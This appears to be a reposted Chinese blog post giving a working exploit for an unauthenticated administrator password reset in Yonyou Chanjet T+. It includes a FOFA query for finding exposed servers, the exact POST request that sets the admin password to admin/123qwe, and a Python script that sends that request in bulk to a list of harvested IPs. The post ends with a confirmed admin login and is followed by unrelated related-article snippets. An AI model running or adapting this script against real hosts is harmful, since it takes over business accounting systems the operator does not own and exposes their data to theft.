0x10 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞

news/2024/10/4 8:00:35/

参考:

  •  用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞 | PeiQi文库 (wgpsec.org)

免责声明

欢迎访问我的博客。以下内容仅供教育和信息用途:

  1. 合法性:我不支持或鼓励非法活动。请确保遵守法律法规。
  2. 信息准确性:尽管我尽力提供准确的信息,但不保证其完全准确或适用。使用前请自行验证。
  3. 风险提示:技术使用可能带来风险,如系统损坏或数据丢失。请谨慎使用,并自行承担风险。
  4. 责任限制:我对使用博客内容产生的任何损害不承担责任
  5. 第三方链接:博客中的链接仅为方便用户,内容不由我负责。

使用本博客即表示您同意以上条款。如果有疑问,请联系我。

漏洞描述

用友畅捷通T+的 RecoverPassword.aspx 存在未授权管理员密码修改漏洞,攻击者可以通过该漏洞修改管理员账号密码,从而登录后台。

漏洞影响

  • 用友畅捷通T+ 系统的安全性受到威胁,攻击者可能获取管理员权限。

网络测绘

网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统

app="畅捷通-TPlus"

漏洞复现

登录页面

验证POC, 重置账号密码为 admin/123qwe

POST /tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd{"pwdNew":"46f94c8de14fb36680850768ff1b7f2a"}

注入成功的回显

编写脚本进行批量复现 

可以先编写个爬虫脚本收集fofa上的ip信息:Python教程:如何用Python编写FOFA爬虫获取信息?_fofa python-CSDN博客

批量验证url

import requests
import json# 设置请求头,模拟浏览器(不然有些网站无法正常获取到响应信息)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36','Accept-Language': 'en-US,en;q=0.9','Accept-Encoding': 'gzip, deflate, br','Connection': 'keep-alive','Content-Type': 'application/json',  # 指定内容类型为 JSON
}# 从本地的 ip.txt 文件中读取 URL
with open('ip.txt', 'r') as file:urls = file.readlines()# 要发送的 JSON 数据
data = {"pwdNew": "46f94c8de14fb36680850768ff1b7f2a"
}# 遍历每个 URL 并发送请求
for url in urls:url = url.strip()  # 去掉首尾空白字符url += "/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"if url:  # 确保 URL 不为空try:# 设置请求超时时间为 10 秒response = requests.post(url, headers=headers, data=json.dumps(data), timeout=10)print(f'URL: {url} - 状态码: {response.status_code}')# 检查状态码和响应内容if response.status_code == 200 and "value" in response.text:print('请求成功: 响应内容:', response.text)else:print('请求失败: 状态码为', response.status_code)except requests.exceptions.RequestException as e:print(f'请求 {url} 时出现错误: {e}')

手动验证一下账号,登录成功


http://www.ppmy.cn/news/1533295.html

相关文章

【AIGC】ChatGPT提示词解析:如何打造个人IP、CSDN爆款技术文案与高效教案设计

博客主页: [小ᶻZ࿆] 本文专栏: AIGC | ChatGPT 文章目录 💯前言💯打造个人IP爆款文案提示词使用方法 💯CSDN爆款技术文案提示词使用方法 💯高效教案设计提示词使用方法 💯小结 💯前言 在这…

红狮金业:地缘紧张局势下,黄金价格屡创新高

今日(9 月 25 日)现货黄金日内维持震荡走势。红狮黄金行情软件显示,今日开盘报 2655.45 美元/盎司,最高触及 2670.09 美元/盎司,最低触及 2654.85 美元/盎司。截至 9 月 25 日北京时间 13:17,今日黄金现货价…

北京数字孪生工业互联网可视化技术,赋能新型工业化智能制造工厂

随着北京数字孪生工业互联网可视化技术的深入应用,新型工业化智能制造工厂正逐步迈向智能化、高效化的全新阶段。这项技术不仅实现了物理工厂与数字世界的精准映射,更通过大数据分析、人工智能算法等先进手段,为生产流程优化、资源配置合理化…

行情叠加量化,占据市场先机!

A股久违的3000点,最近都没有更新,现在终于对我们的市场又来点信息。相信在座的朋友这几天都是喜笑颜开,对A股又充满信心。当前行情好起来了,很多朋友又开始重回市场,研究股票学习量化,今天我们给大家重温下…

【优选算法之哈希表】No.11--- 经典哈希表算法

文章目录 前言一、哈希表简介1.1 什么是哈希表1.2 哈希表的用途1.3 什么时候使用哈希表1.4 怎么用哈希表 二、哈希表示例2.1 两数之和2.2 判定是否互为字符重排2.3 存在重复元素2.4 存在重复元素 II2.5 字⺟异位词分组 前言 👧个人主页:小沈YO. &#x1…

理想汽车使用无仪表盘设计的原因和弊端

理想汽车采用无仪表盘设计,这一决策背后蕴含着多方面的考量,同时也伴随着一些潜在的弊端。以下是对这一设计的详细分析: 一、理想汽车采用无仪表盘设计的原因 追求极简与科技感 理想汽车在设计上一直追求极简与科技感的融合。无仪表盘设计能…

HuggingChat macOS 版现已发布

Hugging Face 的开源聊天应用程序 Hugging Chat,现已推出适用于 macOS 的版本。 主要特点 Hugging Chat macOS 版本具有以下亮点: 强大的模型支持: 用户可以一键访问多个顶尖的开源大语言模型,包括 Qwen 2.5 72B、Command R、Phi 3.5、Mistral 12B 等等&…

scala 2.12 error: value foreach is not a member of Object

如图所示:在scala 2.11的时候下面的不报错,但是在2.12下报错了 在scala2.12环境下错误如下: 经过查找资料得到:df 后面加上rdd 即可